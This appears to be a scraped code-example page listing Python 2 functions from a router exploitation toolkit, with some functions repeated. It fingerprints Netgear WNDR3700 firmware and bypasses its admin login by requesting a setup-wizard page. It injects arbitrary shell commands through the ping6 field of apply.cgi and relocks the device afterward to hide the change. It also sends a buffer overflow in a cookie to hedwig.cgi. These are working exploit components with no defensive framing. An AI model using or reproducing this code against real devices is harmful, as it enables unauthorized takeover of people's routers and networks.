def WNDR3700_version_detect(host,logger=None):
    client=HttpClient()
    version=None
    url="http://%s" % host
    print "trying %s" %url

    try:
        client.send(url)
    except HTTPError as httpe:
        basic_realm=httpe.headers['www-authenticate']
    
    #all known v3 firmwares put WNDR3700v3 in basic realm header
    if basic_realm and "WNDR3700v3" in basic_realm:
        document=None
        try:
            document=client.send("http://%s/genie_apply.htm" % host)
        except HTTPError as httpe:
            #1.0.0.18 does not have genie and instead returns 401
            if httpe.code==401:
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.18")
                version=WNDR3700_VERSIONS["1.0.0.18"]
        if document:
            #1.0.0.22 does have genie and genie_apply.htm does not require auth
            if logger:
                logger.LOG_INFO("Got version 1.0.0.22")
            version = WNDR3700_VERSIONS["1.0.0.22"]
    
    if not version:
        raise Exception("WNDR3700 version not detected.")
    
    return version
Beispiel #2
0
def inject_command(command,target,port=80,logger=None,https=False):
    if not logger:
        logger=Logging()
    
    client=HttpClient()
    protocol="http"
    
    if https:
        protocol="https"
    
    url="%s://%s:%d/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
    logger.LOG_INFO("Requesting ping6_traceroute6_hidden_info.htm in order to obtain timestamp.")
    resp=client.send(url)
    timestamp=extract_timestamp(resp)
    if timestamp:
        logger.LOG_DEBUG("Got timestamp: %s" % timestamp)
    else:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
        raise Exception()
        
    url="%s://%s:%d/apply.cgi?/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
    url+="%20timestamp="+timestamp
    logger.LOG_DEBUG("URL: %s" % url)
    post_data={}
    post_data["submit_flag"]="ping6"
    post_data["ping6_text"]=command
    post_data["traceroute6_text"]=""
    client.send(url,post_data=post_data,urlencode=True)
Beispiel #3
0
def relock_target(target,port=80,logger=None,https=False):
    if not logger:
        logger=Logging()
    protocol="http"
    if https:
        protocol="https"
        
    if not is_unlocked(target,port=port,https=https):
        logger.LOG_INFO("Target is already locked!")
        return
        
    client=HttpClient()
    url="%s://%s:%d/BRS_success.html" %(protocol,target,port)
    logger.LOG_INFO("Requesting BRS_success.html in order to obtain timestamp.")
    resp=client.send(url)
    
    timestamp=extract_timestamp(resp)
    if not timestamp:
        logger.LOG_WARN("Couldn't extract timestamp from response.")
    else:
        logger.LOG_DEBUG("Timestamp: %s" % timestamp)
    url=("%s://%s:%d/apply.cgi?/" % (protocol,target,port)+
        "BRS_netgear_success.html%20timestamp=" + timestamp)
    post_data={"submit_flag":"hijack_success",
                "click_flag":"0"}
    

    resp=client.send(url,post_data=post_data,urlencode=True)
def WNDR3700_version_detect(host, logger=None):
    client = HttpClient()
    version = None
    url = "http://%s" % host
    print "trying %s" % url

    try:
        client.send(url)
    except HTTPError as httpe:
        basic_realm = httpe.headers['www-authenticate']

    #all known v3 firmwares put WNDR3700v3 in basic realm header
    if basic_realm and "WNDR3700v3" in basic_realm:
        document = None
        try:
            document = client.send("http://%s/genie_apply.htm" % host)
        except HTTPError as httpe:
            #1.0.0.18 does not have genie and instead returns 401
            if httpe.code == 401:
                if logger:
                    logger.LOG_INFO("Got version 1.0.0.18")
                version = WNDR3700_VERSIONS["1.0.0.18"]
        if document:
            #1.0.0.22 does have genie and genie_apply.htm does not require auth
            if logger:
                logger.LOG_INFO("Got version 1.0.0.22")
            version = WNDR3700_VERSIONS["1.0.0.22"]

    if not version:
        raise Exception("WNDR3700 version not detected.")

    return version
def send_overflow(buf,target_ip,logger):
    client=HttpClient()
    headers={}
    headers["Referer"]="http://192.168.0.1/bsc_wlan.php"
    headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
    headers["Connection"]="keep-alive"
    headers["Cookie"]="uid=%s" % str(buf)
    url="http://%s/hedwig.cgi" % target_ip
    
    post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
    logger.LOG_INFO("Sending post request.")
    try:
        client.send(url,headers=headers,post_data=post_data,urlencode=True)
    except Exception as e:
        print e
    return
Beispiel #6
0
def unlock_target(target,port=80,logger=None,https=False):
    if not logger:
        logger=Logging()
    
    protocol="http"
    if https:
        protocol="https"
        
    if is_unlocked(target,port=port,https=https):
        logger.LOG_INFO("Target is already unlocked.")
        return
    else:
        logger.LOG_INFO("Unlocking target.")    
        client=HttpClient()
        url="%s://%s:%d/BRS_02_genieHelp.html" % (protocol,target,port)
        client.send(url)
    if is_unlocked(target,port=port,https=https):
        logger.LOG_INFO("Target unlocked!")
    else:
        logger.LOG_WARN("Target unlock failed!")
        raise Exception("Unlock failed.")
Beispiel #7
0
def is_unlocked(target,port=80,https=False):
    logger=Logging()
    protocol="http"
    if https:
        protocol="https"
    client=HttpClient()
    url="%s://%s:%d/index.htm" % (protocol,target,port)

    unlocked = False

    try:
        client.send(url)
        unlocked=True
    except HTTPError as e:
        logger.LOG_DEBUG("Got code: %s" % e.code)
        if e.code == 401:
            unlocked=False
        else:
            raise
    
    return unlocked
Beispiel #8
0
def fingerprint_netgear_version(target, port=80, https=False):
    client = HttpClient()

    protocol = "http"
    if https:
        protocol = "https"
    url = "%s://%s:%d/currentsetting.htm" % (protocol, target, port)

    try:
        resp = client.send(url)
    except HTTPError as e:
        if e.code == 401 or e.code == 404:
            return {}
        else:
            raise

    lines = resp.splitlines()
    fingerprint = {}
    for line in lines:
        (k, v) = line.strip().split("=")
        fingerprint[k] = v
    return fingerprint
Beispiel #9
0
def fingerprint_netgear_version(target,port=80,https=False):
    client=HttpClient()
    
    protocol="http"
    if https:
        protocol="https"
    url="%s://%s:%d/currentsetting.htm" % (protocol,target,port)
    
    try:
        resp=client.send(url)
    except HTTPError as e:
        if e.code==401 or e.code == 404:
            return {}
        else:
            raise
    
    
    lines=resp.splitlines()
    fingerprint={}
    for line in lines:
        (k,v)=line.strip().split("=")
        fingerprint[k]=v
    return fingerprint